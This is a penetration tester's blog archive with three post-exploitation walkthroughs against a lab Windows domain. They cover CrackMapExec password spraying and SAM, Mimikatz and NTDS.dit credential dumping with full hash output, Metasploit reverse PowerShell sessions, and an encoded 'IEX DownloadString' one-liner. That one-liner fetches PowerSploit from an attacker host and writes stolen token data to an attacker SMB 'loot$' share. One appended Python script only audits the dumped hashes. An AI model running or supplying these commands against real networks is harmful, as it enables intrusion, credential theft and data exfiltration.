Archive for category Post Exploitation

WMI Post Exploitation

I’ve recently stumbled upon a script that has become my favorite post-exploitation tool. It’s multi-threaded, contains no local binaries, and needs no dropper binaries. It provides a plethora of functionality for escalating privileges across the network, all through WMI calls. The tool is CrackMapExec, written by byt3bl33d3r.

Imagine that we’ve compromised credentials on an internal assessment. CrackMapExec can easily be utilized to find where those credentials have elevated privileges. This command runs 100 threads attempting to log in to all systems in the 192.168.81.0/24 range:

[/opt/CrackMapExec] # ./crackmapexec.py -u TrustedSec -p Password123 -d workgroup -t 100 192.168.81.0/24
03-08-2016 12:34:29 SMB 192.168.81.10:445 PWNT-DC    [*] Windows 6.1 Build 7601 (name:PWNT-DC) (domain:workgroup)
03-08-2016 12:34:29 SMB 192.168.81.10:445 PWNT-DC    [-] workgroup\TrustedSec:Password123 SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
03-08-2016 12:34:35 SMB 192.168.81.216:445 WIN7-SPOONMAN [*] Windows 6.1 Build 7601 (name:WIN7-SPOONMAN) (domain:workgroup)
03-08-2016 12:34:35 SMB 192.168.81.219:445 WIN8-SPOONMAN [*] Windows 10.0 Build 10586 (name:WIN8-SPOONMAN) (domain:workgroup)
03-08-2016 12:34:35 SMB 192.168.81.216:445 WIN7-SPOONMAN [+] Login successful workgroup\TrustedSec:Password123
03-08-2016 12:34:35 SMB 192.168.81.219:445 WIN8-SPOONMAN [-] workgroup\TrustedSec:Password123 SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)

Having found administrative access on one system, we can dump its local SAM hashes, which may then be usable in a pass-the-hash attack against other systems on the network:

[/opt/CrackMapExec] # ./crackmapexec.py -u TrustedSec -p Password123 -d workgroup 192.168.81.216 --sam    
03-08-2016 12:39:54 SMB 192.168.81.216:445 WIN7-SPOONMAN [*] Windows 6.1 Build 7601 (name:WIN7-SPOONMAN) (domain:workgroup)
03-08-2016 12:39:54 SMB 192.168.81.216:445 WIN7-SPOONMAN [+] Login successful workgroup\TrustedSec:Password123
03-08-2016 12:39:55 SMB 192.168.81.216:445 WIN7-SPOONMAN [+] Dumping SAM hashes (uid:rid:lmhash:nthash)
03-08-2016 12:39:55 SMB 192.168.81.216:445 WIN7-SPOONMAN Administrator:500:aad3b435b51404eeaad3b435b51404ee:bc23a1506bd3c8d3a533680c516bab27:::
03-08-2016 12:39:55 SMB 192.168.81.216:445 WIN7-SPOONMAN Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
03-08-2016 12:39:56 SMB 192.168.81.216:445 WIN7-SPOONMAN TrustedSec:1001:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
03-08-2016 12:39:56 SMB 192.168.81.216:445 WIN7-SPOONMAN ASPNET:1005:aad3b435b51404eeaad3b435b51404ee:e8dfb6d1552e2fc23a66e8d573abbdba:::
03-08-2016 12:39:56 SMB 192.168.81.216:445 WIN7-SPOONMAN HomeGroupUser$:1007:aad3b435b51404eeaad3b435b51404ee:46e6eeed8d95245e068dfbec8a81ef40:::
03-08-2016 12:39:56 SMB 192.168.81.216:445 WIN7-SPOONMAN TrustedUser:1012:aad3b435b51404eeaad3b435b51404ee:dea92d9004d55c23189754069eeec7fc:::

We can also scrape clear text credentials from memory:

[/opt/CrackMapExec] # ./crackmapexec.py -u TrustedSec -p Password123 -d workgroup 192.168.81.216 --mimikatz
03-08-2016 12:40:54 SMB 192.168.81.216:445 WIN7-SPOONMAN [*] Windows 6.1 Build 7601 (name:WIN7-SPOONMAN) (domain:workgroup)
03-08-2016 12:40:55 SMB 192.168.81.216:445 WIN7-SPOONMAN [+] Login successful workgroup\TrustedSec:Password123
03-08-2016 12:40:56 SMB 192.168.81.216:445 WIN7-SPOONMAN [+] Executed command via WMIEXEC
03-08-2016 12:40:59 192.168.81.216 - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 -
03-08-2016 12:41:04 192.168.81.216 - - "POST / HTTP/1.1" 200 -
03-08-2016 12:41:04 PARSER 192.168.81.216:1138            [+] Found plain text credentials (domain\user:password)
03-08-2016 12:41:04 PARSER 192.168.81.216:1138            PWNT\TrustedSec:GoatBah1!
03-08-2016 12:41:04 PARSER 192.168.81.216:1138            PWNT\WIN7-SPOONMAN$:%Xa4Qt*Qbq\I3N-DdW?@btkdv1-]JK<AQ@I;k`K4e, 2"Q,(%NZy@hfQy^q"q;<L+ubiD7"np;=T#c<\]\]criYyy[(nE y6(Ra;as[Z-Sti-pbm;
03-08-2016 12:41:04 PARSER 192.168.81.216:1138            PWNT\WIN7-SPOONMAN$:%Xa4Qt*Qbq\I3N-DdW?@btkdv1-]JK<AQ@I;k`K4e, 2"Q,(%NZy@hfQy^q"q;<L+ubiD7"np;=T#c<\]\]criYyy[(nE y6(Ra;as[Z-Sti-pbm;
03-08-2016 12:41:04 PARSER 192.168.81.216:1138            [*] Saved Mimikatz's output to Mimikatz-192.168.81.216-2016-03-08_124104.log

Notice that all results are logged to the ./logs directory. Mimikatz recovered the password of a member of the “Domain Admins” group, so let’s retrieve the hashes safely from NTDS.dit on the domain controller:

[/opt/CrackMapExec] # ./crackmapexec.py -u TrustedSec -p GoatBah1! -d pwnt.com 192.168.81.10 --ntds drsuapi
03-08-2016 12:43:45 SMB 192.168.81.10:445 PWNT-DC    [*] Windows 6.1 Build 7601 (name:PWNT-DC) (domain:pwnt.com)
03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC    [+] Login successful pwnt.com\TrustedSec:GoatBah1!
03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC    [+] Dumping NTDS.dit secrets using the DRSUAPI method (domain\uid:rid:lmhash:nthash)
03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC    Administrator:500:aad3b435b51404eeaad3b435b51404ee:918d38906649503fde8a641dbd87d857:::
03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC    krbtgt:502:aad3b435b51404eeaad3b435b51404ee:903cd15bd70bbd6f4517ad01eeccbe15:::
03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC    TrustedSec:1000:aad3b435b51404eeaad3b435b51404ee:918d38906649503fde8a641dbd87d857:::
03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC    pwnt.com\testuser:1104:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC    PWNT-DC$:1001:aad3b435b51404eeaad3b435b51404ee:07a60a315af67d202aa52e846ee4fb27:::
03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC    TEST$:1105:aad3b435b51404eeaad3b435b51404ee:4ab69c349bfaa599b46069f3d57dbe49:::
03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC    TEST2$:1106:aad3b435b51404eeaad3b435b51404ee:3ce8a48ae2264366c6c0ce9b6155bab6:::
03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC    WIN7-SPOONMAN$:1109:aad3b435b51404eeaad3b435b51404ee:63c459c139c5bdeb4c404327261d75f1:::

These are just a couple of examples, but there is so much more functionality packed into this script. So check it out! Thanks byt3bl33d3r!
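As an added example (not part of the post or of CrackMapExec itself), here is a small parser for the console output shown above: it summarizes which hosts accepted the credential and audits the dumped hashes for empty and shared passwords, which is how a blue team would turn such a dump into findings. The sample lines are copied (with some error messages shortened) from the post’s own output.

```python
"""Summarise CrackMapExec console output: login result per host, plus an audit
of dumped SAM/NTDS hashes for empty and shared passwords."""
import re
from collections import defaultdict

# Constructed sample: lines copied from the post's CrackMapExec output.
SAMPLE_OUTPUT = [
    r"03-08-2016 12:34:29 SMB 192.168.81.10:445 PWNT-DC    [*] Windows 6.1 Build 7601 (name:PWNT-DC) (domain:workgroup)",
    r"03-08-2016 12:34:29 SMB 192.168.81.10:445 PWNT-DC    [-] workgroup\TrustedSec:Password123 SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid.)",
    r"03-08-2016 12:34:35 SMB 192.168.81.216:445 WIN7-SPOONMAN [+] Login successful workgroup\TrustedSec:Password123",
    r"03-08-2016 12:34:35 SMB 192.168.81.219:445 WIN8-SPOONMAN [-] workgroup\TrustedSec:Password123 SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid.)",
    r"03-08-2016 12:39:55 SMB 192.168.81.216:445 WIN7-SPOONMAN Administrator:500:aad3b435b51404eeaad3b435b51404ee:bc23a1506bd3c8d3a533680c516bab27:::",
    r"03-08-2016 12:39:55 SMB 192.168.81.216:445 WIN7-SPOONMAN Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    r"03-08-2016 12:39:56 SMB 192.168.81.216:445 WIN7-SPOONMAN TrustedSec:1001:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::",
    r"03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC    Administrator:500:aad3b435b51404eeaad3b435b51404ee:918d38906649503fde8a641dbd87d857:::",
    r"03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    r"03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC    TrustedSec:1000:aad3b435b51404eeaad3b435b51404ee:918d38906649503fde8a641dbd87d857:::",
    r"03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC    pwnt.com\testuser:1104:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::",
]

# "<date> <time> <proto> <ip>:<port> <hostname>   <message>"
LINE_RE = re.compile(
    r"^(?P<ts>\d\d-\d\d-\d{4} \d\d:\d\d:\d\d) (?P<proto>\S+) "
    r"(?P<ip>[\d.]+):(?P<port>\d+) (?P<host>\S+)\s+(?P<msg>.*)$")
# pwdump-style line: user:rid:lmhash:nthash:::
HASH_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$")
# NT hash of the empty string: the account has no password set.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"


def parse(lines):
    """Turn console lines into event dicts; lines that don't match are skipped."""
    events = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ev = m.groupdict()
        msg = ev["msg"]
        h = HASH_RE.match(msg)
        if h:
            ev["kind"] = "hash"
            ev.update(h.groupdict())
        elif msg.startswith("[+] Login successful"):
            ev["kind"] = "login_ok"
            ev["cred"] = msg.split()[-1]
        elif "STATUS_LOGON_FAILURE" in msg:
            ev["kind"] = "login_fail"
            ev["cred"] = msg.split()[1]
        else:
            ev["kind"] = "other"
        events.append(ev)
    return events


def login_summary(events):
    """Map hostname -> 'success' or 'failure' for the credential that was sprayed."""
    out = {}
    for ev in events:
        if ev["kind"] == "login_ok":
            out[ev["host"]] = "success"
        elif ev["kind"] == "login_fail":
            out.setdefault(ev["host"], "failure")
    return out


def audit_hashes(events):
    """Flag accounts with an empty password and groups of accounts sharing one NT hash
    (same password reused across accounts or hosts)."""
    by_nt = defaultdict(list)
    for ev in events:
        if ev["kind"] == "hash":
            by_nt[ev["nt"]].append((ev["host"], ev["user"]))
    empty = by_nt.pop(EMPTY_NT, [])
    shared = {nt: accts for nt, accts in by_nt.items() if len(accts) > 1}
    return {"empty_password": empty, "shared_password": shared}


if __name__ == "__main__":
    evs = parse(SAMPLE_OUTPUT)
    print(login_summary(evs))
    print(audit_hashes(evs))
```

On the post’s own dump this reports that the DC’s Administrator and TrustedSec accounts share a password, and that the local TrustedSec account on WIN7-SPOONMAN uses the same password as the domain’s testuser.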


Interactive PowerShell Sessions Within Meterpreter

In case anyone missed it, Metasploit has a couple of new payloads that allow interactive PowerShell sessions. What does that mean? Previously, if you tried to open a PowerShell session within Meterpreter, there was no interaction between PowerShell and your session.

Example:

msf exploit(psexec_psh) > exploit 

[*] Started HTTPS reverse handler on https://0.0.0.0:444/
[*] 192.168.81.10:445 - Executing the payload...
[+] 192.168.81.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.81.10:49309 (UUID: 820e464723e817f9/x86=1/windows=1/2015-06-08T16:12:05Z) Staging Native payload ...
[*] Meterpreter session 23 opened (192.168.81.217:444 -> 192.168.81.10:49309) at 2015-06-08 12:12:05 -0400

meterpreter > shell
Process 2776 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>powershell
powershell
Windows PowerShell 
Copyright (C) 2009 Microsoft Corporation. All rights reserved.

Get-ExecutionPolicy


Any command that you type seems to disappear into the ether. Now, thanks to the hard work of Ben Turner (@benpturner) and Dave Hardy (@davehardy20) at Nettitude, we have full interaction with PowerShell sessions! Their introduction to these modules is here.

To find the new payloads within Metasploit, simply search for “Interactive_Powershell”:

msf payload(reverse_powershell) > search Interactive_Powershell

Matching Modules
================

   Name                                        Disclosure Date  Rank    Description
   ----                                        ---------------  ----    -----------
   payload/cmd/windows/powershell_bind_tcp                      normal  Windows Interactive Powershell Session, Bind TCP
   payload/cmd/windows/powershell_reverse_tcp                   normal  Windows Interactive Powershell Session, Reverse TCP
   payload/windows/powershell_bind_tcp                          normal  Windows Interactive Powershell Session, Bind TCP
   payload/windows/powershell_reverse_tcp                       normal  Windows Interactive Powershell Session, Reverse TCP

Let’s try a “Reverse TCP” payload:

msf exploit(psexec_psh) > set payload windows/powershell_reverse_tcp
payload => windows/powershell_reverse_tcp
msf exploit(psexec_psh) > exploit 

[*] Started reverse handler on 192.168.81.217:444 
[*] 192.168.81.10:445 - Executing the payload...
[+] 192.168.81.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] Powershell session session 24 opened (192.168.81.217:444 -> 192.168.81.10:49317) at 2015-06-08 12:15:42 -0400

Windows PowerShell running as user PWNT-DC$ on PWNT-DC
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>Get-ExecutionPolicy
Bypass

This allows us to use all of our favorite PowerShell tools, such as PowerSploit and PowerTools (included in Veil-Framework), from within a Meterpreter session. To avoid downloading the tools to disk, we use “Invoke-Expression” to run the tools directly in memory. I like to host them locally, as opposed to downloading them from the Internet.

PS C:\Windows\system32>IEX(New-Object Net.WebClient).DownloadString("http://192.168.81.217/PowerTools/PowerView/powerview.ps1")
PS C:\Windows\system32> Get-NetGroup "Domain Admins" |select UserName

UserName                                                                       
--------                                                                       
TrustedSec                                                                     
Administrator

Instead of loading modules from within an existing session, the payloads also let you specify modules before the session is created, by setting the “LOAD_MODULES” parameter.

Payload options (windows/powershell_reverse_tcp):

   Name          Current Setting                                           Required  Description
   ----          ---------------                                           --------  -----------
   EXITFUNC      thread                                                    yes       Exit technique (accepted: seh, thread, process, none)
   LHOST         192.168.81.217                                            yes       The listen address
   LOAD_MODULES  http://192.168.81.217/PowerTools/PowerView/powerview.ps1  no        A list of powershell modules seperated by a comma to download over the web
   LPORT         444                                                       yes       The listen port

msf exploit(psexec_psh) > exploit 

[*] Loading 1 modules into the interactive PowerShell session
[*] Started reverse handler on 192.168.81.217:444 
[*] 192.168.81.10:445 - Executing the payload...
[+] 192.168.81.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] Powershell session session 26 opened (192.168.81.217:444 -> 192.168.81.10:49391) at 2015-06-08 12:29:58 -0400

Windows PowerShell running as user PWNT-DC$ on PWNT-DC
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> Get-NetForest


Name                  : pwnt.com
Sites                 : {Default-First-Site-Name}
Domains               : {pwnt.com}
GlobalCatalogs        : {pwnt-dc.pwnt.com}
ApplicationPartitions : {DC=DomainDnsZones,DC=pwnt,DC=com, DC=ForestDnsZones,DC
                        =pwnt,DC=com}
ForestMode            : Windows2008R2Forest
RootDomain            : pwnt.com
Schema                : CN=Schema,CN=Configuration,DC=pwnt,DC=com
SchemaRoleOwner       : pwnt-dc.pwnt.com
NamingRoleOwner       : pwnt-dc.pwnt.com

You can also load multiple modules at once by providing a comma-separated list. I cloned the PowerSploit and PowerTools modules to my Apache root, so to enumerate all modules I simply use “find” to list all PowerShell scripts recursively.

root@kali:~# find /var/www -name "*.ps1"
/var/www/PowerSploit/CodeExecution/Invoke-ShellcodeMSIL.ps1
/var/www/PowerSploit/CodeExecution/Invoke-DllInjection.ps1
/var/www/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection.ps1
/var/www/PowerSploit/CodeExecution/Invoke--Shellcode.ps1
/var/www/PowerSploit/CodeExecution/Invoke-Shellcode.ps1
/var/www/PowerSploit/Recon/Invoke-Portscan.ps1
/var/www/PowerSploit/Recon/Get-ComputerDetails.ps1
/var/www/PowerSploit/Recon/Invoke-ReverseDnsLookup.ps1
/var/www/PowerSploit/Recon/Get-HttpStatus.ps1
/var/www/PowerSploit/AntivirusBypass/Find-AVSignature.ps1
/var/www/PowerSploit/Exfiltration/Invoke-CredentialInjection.ps1
/var/www/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1
/var/www/PowerSploit/Exfiltration/Invoke-NinjaCopy.ps1
/var/www/PowerSploit/Exfiltration/Out-Minidump.ps1
/var/www/PowerSploit/Exfiltration/Get-GPPPassword.ps1
/var/www/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1
/var/www/PowerSploit/Exfiltration/Get-VaultCredential.ps1
/var/www/PowerSploit/Exfiltration/Get-Keystrokes.ps1
/var/www/PowerSploit/Exfiltration/Get-TimedScreenshot.ps1
/var/www/PowerSploit/Exfiltration/VolumeShadowCopyTools.ps1
/var/www/PowerSploit/ScriptModification/Remove-Comments.ps1
/var/www/PowerSploit/ScriptModification/Out-EncodedCommand.ps1
/var/www/PowerSploit/ScriptModification/Out-CompressedDll.ps1
/var/www/PowerSploit/ScriptModification/Out-EncryptedScript.ps1
/var/www/PowerTools/PowerBreach/PowerBreach.ps1
/var/www/PowerTools/PewPewPew/Invoke-MassMimikatz.ps1
/var/www/PowerTools/PewPewPew/Invoke-MassTemplate.ps1
/var/www/PowerTools/PewPewPew/Invoke-MassSearch.ps1
/var/www/PowerTools/PewPewPew/Invoke-MassCommand.ps1
/var/www/PowerTools/PewPewPew/Invoke-MassTokens.ps1
/var/www/PowerTools/PowerPick/PSInjector/DLLEnc.ps1
/var/www/PowerTools/PowerPick/PSInjector/PSInject.ps1
/var/www/PowerTools/PowerUp/PowerUp.ps1
/var/www/PowerTools/PowerView/functions/Invoke-UserHunter.ps1
/var/www/PowerTools/PowerView/functions/Get-NetShare.ps1
/var/www/PowerTools/PowerView/functions/Invoke-ShareFinder.ps1
/var/www/PowerTools/PowerView/functions/Invoke-Netview.ps1
/var/www/PowerTools/PowerView/functions/Get-Net.ps1
/var/www/PowerTools/PowerView/functions/Get-NetSessions.ps1
/var/www/PowerTools/PowerView/functions/Get-NetLoggedon.ps1
/var/www/PowerTools/PowerView/powerview.ps1

To replace “/var/www” with your web host, use “sed”:

root@kali:~# find /var/www -name "*.ps1" |sed 's_/var/www_http://192.168.81.217_'
http://192.168.81.217/PowerSploit/CodeExecution/Invoke-ShellcodeMSIL.ps1
http://192.168.81.217/PowerSploit/CodeExecution/Invoke-DllInjection.ps1
http://192.168.81.217/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection.ps1
http://192.168.81.217/PowerSploit/CodeExecution/Invoke--Shellcode.ps1
http://192.168.81.217/PowerSploit/CodeExecution/Invoke-Shellcode.ps1
http://192.168.81.217/PowerSploit/Recon/Invoke-Portscan.ps1
http://192.168.81.217/PowerSploit/Recon/Get-ComputerDetails.ps1
http://192.168.81.217/PowerSploit/Recon/Invoke-ReverseDnsLookup.ps1
http://192.168.81.217/PowerSploit/Recon/Get-HttpStatus.ps1
http://192.168.81.217/PowerSploit/AntivirusBypass/Find-AVSignature.ps1
http://192.168.81.217/PowerSploit/Exfiltration/Invoke-CredentialInjection.ps1
http://192.168.81.217/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1
http://192.168.81.217/PowerSploit/Exfiltration/Invoke-NinjaCopy.ps1
http://192.168.81.217/PowerSploit/Exfiltration/Out-Minidump.ps1
http://192.168.81.217/PowerSploit/Exfiltration/Get-GPPPassword.ps1
http://192.168.81.217/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1
http://192.168.81.217/PowerSploit/Exfiltration/Get-VaultCredential.ps1
http://192.168.81.217/PowerSploit/Exfiltration/Get-Keystrokes.ps1
http://192.168.81.217/PowerSploit/Exfiltration/Get-TimedScreenshot.ps1
http://192.168.81.217/PowerSploit/Exfiltration/VolumeShadowCopyTools.ps1
http://192.168.81.217/PowerSploit/ScriptModification/Remove-Comments.ps1
http://192.168.81.217/PowerSploit/ScriptModification/Out-EncodedCommand.ps1
http://192.168.81.217/PowerSploit/ScriptModification/Out-CompressedDll.ps1
http://192.168.81.217/PowerSploit/ScriptModification/Out-EncryptedScript.ps1
http://192.168.81.217/PowerTools/PowerBreach/PowerBreach.ps1
http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassMimikatz.ps1
http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassTemplate.ps1
http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassSearch.ps1
http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassCommand.ps1
http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassTokens.ps1
http://192.168.81.217/PowerTools/PowerPick/PSInjector/DLLEnc.ps1
http://192.168.81.217/PowerTools/PowerPick/PSInjector/PSInject.ps1
http://192.168.81.217/PowerTools/PowerUp/PowerUp.ps1
http://192.168.81.217/PowerTools/PowerView/functions/Invoke-UserHunter.ps1
http://192.168.81.217/PowerTools/PowerView/functions/Get-NetShare.ps1
http://192.168.81.217/PowerTools/PowerView/functions/Invoke-ShareFinder.ps1
http://192.168.81.217/PowerTools/PowerView/functions/Invoke-Netview.ps1
http://192.168.81.217/PowerTools/PowerView/functions/Get-Net.ps1
http://192.168.81.217/PowerTools/PowerView/functions/Get-NetSessions.ps1
http://192.168.81.217/PowerTools/PowerView/functions/Get-NetLoggedon.ps1
http://192.168.81.217/PowerTools/PowerView/powerview.ps1

To create a comma separated list, use “tr”:

root@kali:~# find /var/www -name "*.ps1" |sed 's_/var/www_http://192.168.81.217_' |tr '\n' ','
http://192.168.81.217/PowerSploit/CodeExecution/Invoke-ShellcodeMSIL.ps1,http://192.168.81.217/PowerSploit/CodeExecution/Invoke-DllInjection.ps1,http://192.168.81.217/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection.ps1,http://192.168.81.217/PowerSploit/CodeExecution/Invoke--Shellcode.ps1,http://192.168.81.217/PowerSploit/CodeExecution/Invoke-Shellcode.ps1,http://192.168.81.217/PowerSploit/Recon/Invoke-Portscan.ps1,http://192.168.81.217/PowerSploit/Recon/Get-ComputerDetails.ps1,http://192.168.81.217/PowerSploit/Recon/Invoke-ReverseDnsLookup.ps1,http://192.168.81.217/PowerSploit/Recon/Get-HttpStatus.ps1,http://192.168.81.217/PowerSploit/AntivirusBypass/Find-AVSignature.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Invoke-CredentialInjection.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Invoke-NinjaCopy.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Out-Minidump.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Get-GPPPassword.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Get-VaultCredential.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Get-Keystrokes.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Get-TimedScreenshot.ps1,http://192.168.81.217/PowerSploit/Exfiltration/VolumeShadowCopyTools.ps1,http://192.168.81.217/PowerSploit/ScriptModification/Remove-Comments.ps1,http://192.168.81.217/PowerSploit/ScriptModification/Out-EncodedCommand.ps1,http://192.168.81.217/PowerSploit/ScriptModification/Out-CompressedDll.ps1,http://192.168.81.217/PowerSploit/ScriptModification/Out-EncryptedScript.ps1,http://192.168.81.217/PowerTools/PowerBreach/PowerBreach.ps1,http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassMimikatz.ps1,http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassTemplate.ps1,http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassSearch.ps1,http://192.168.81.217/PowerTools/PewPewPew/Invoke-M
assCommand.ps1,http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassTokens.ps1,http://192.168.81.217/PowerTools/PowerPick/PSInjector/DLLEnc.ps1,http://192.168.81.217/PowerTools/PowerPick/PSInjector/PSInject.ps1,http://192.168.81.217/PowerTools/PowerUp/PowerUp.ps1,http://192.168.81.217/PowerTools/PowerView/functions/Invoke-UserHunter.ps1,http://192.168.81.217/PowerTools/PowerView/functions/Get-NetShare.ps1,http://192.168.81.217/PowerTools/PowerView/functions/Invoke-ShareFinder.ps1,http://192.168.81.217/PowerTools/PowerView/functions/Invoke-Netview.ps1,http://192.168.81.217/PowerTools/PowerView/functions/Get-Net.ps1,http://192.168.81.217/PowerTools/PowerView/functions/Get-NetSessions.ps1,http://192.168.81.217/PowerTools/PowerView/functions/Get-NetLoggedon.ps1,http://192.168.81.217/PowerTools/PowerView/powerview.ps1,

Copy/paste that output into your “LOAD_MODULES” parameter and all the PowerShell goodness is at your fingertips. Go forth and plunder!!!


Account Hunting for Invoke-TokenManipulation

I’ve been searching for quite a while now for the best way to find domain admin tokens once admin rights have been attained on a large number of systems during a pentest. Normally, I run “psexec_loggedin_users” within Metasploit, spool the output to a file, then egrep it for users in the “Domain Admins” group. This often works, but can easily miss systems that still have a domain admin Kerberos security token loaded in memory. There are a couple of “Token_Hunter” post modules, but you need to have a shell on the systems to run them, which can take a long time to establish, load incognito, and list tokens. As much as I love shellz, I certainly don’t care to have a couple thousand of them connecting back to my machine. So, I think I’ve finally pieced together a viable method from a couple of articles posted around the Internet.

The first article is from Chris Campbell, posted on PentestGeek. It shows us how to download and execute a PowerSploit module using PowerShell, all in memory. A couple of posts have described utilizing this method with Invoke-Mimikatz.ps1, so why not Invoke-TokenManipulation.ps1? For reference: Carnal0wnage and HarmJ0y.

To set up the environment, I first downloaded PowerSploit to my Apache directory:

cd /var/www/
git clone https://github.com/mattifestation/PowerSploit.git

Then I configured Samba with an open share to capture the output files:

nano /etc/samba/smb.conf
[loot$]
comment = Loot
path = /root/loot
browseable = yes
read only = no
guest ok = yes
public = yes

Then create the folder and grant full permissions; I created a folder named “tokens” under “loot”.

Then, I stole the “PowerShell encoding” section from David Kennedy’s “unicorn” script to encode the following string:

IEX (New-Object Net.WebClient).DownloadString("http://<attacker_ip>/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1");Invoke-TokenManipulation -Enumerate |Out-File -Encoding "UTF8" -FilePath \\<attacker_ip>\loot$\tokens\$env:computername.txt

This will download “Invoke-TokenManipulation.ps1” from my web host, execute it in memory to enumerate tokens, and write the output to my SMB share in a file named after the computer.

Now, I just use the “psexec_command” module within Metasploit to execute my encoded string on all systems and rain down tokens into my share.

msf auxiliary(psexec_command) > info

       Name: Microsoft Windows Authenticated Administration Utility
     Module: auxiliary/admin/smb/psexec_command
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Royce Davis @R3dy__ <rdavis@accuvant.com>

Basic options:
  Name                  Current Setting  Required  Description
  ----                  ---------------  --------  -----------
  COMMAND                                yes       The command you want to execute on the remote host
  RHOSTS                192.168.81.10    yes       The target address range or CIDR identifier
  RPORT                 445              yes       The Target port
  SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
  SERVICE_DISPLAY_NAME                   no        The service display name
  SERVICE_NAME                           no        The service name
  SMBDomain             pwnt.com         no        The Windows domain to use for authentication
  SMBPass               GoatBah1!        no        The password for the specified username
  SMBSHARE              C$               yes       The name of a writeable share on the server
  SMBUser               TrustedSec       no        The username to authenticate as
  THREADS               255              yes       The number of concurrent threads
  WINPATH               WINDOWS          yes       The name of the remote Windows directory

Description:
  This module uses a valid administrator username and password to 
  execute an arbitrary command on one or more hosts, using a similar 
  technique than the "psexec" utility provided by SysInternals. Daisy 
  chaining commands with '&' does not work and users shouldn't try it. 
  This module is useful because it doesn't need to upload any binaries 
  to the target machine.

References:
  http://cvedetails.com/cve/1999-0504/
  http://www.osvdb.org/3106
  http://www.accuvant.com/blog/2012/11/13/owning-computers-without-shell-access
  http://sourceforge.net/projects/smbexec/
  http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx

msf auxiliary(psexec_command) > set command powershell -nop -win hidden -noni -enc <base64-encoded command>
command => powershell -nop -win hidden -noni -enc <base64-encoded command>
msf auxiliary(psexec_command) > run

[*] 192.168.81.10:445 - Executing the command...
[+] 192.168.81.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] checking if the file is unlocked
[*] 192.168.81.10:445 - Unable to get handle: The server responded with error: STATUS_SHARING_VIOLATION (Command=45 WordCount=0)
[-] Command seems to still be executing. Try increasing RETRY and DELAY
[*] 192.168.81.10:445 - Getting the command output...
[*] 192.168.81.10:445 - Command finished with no output
[*] 192.168.81.10:445 - Executing cleanup...
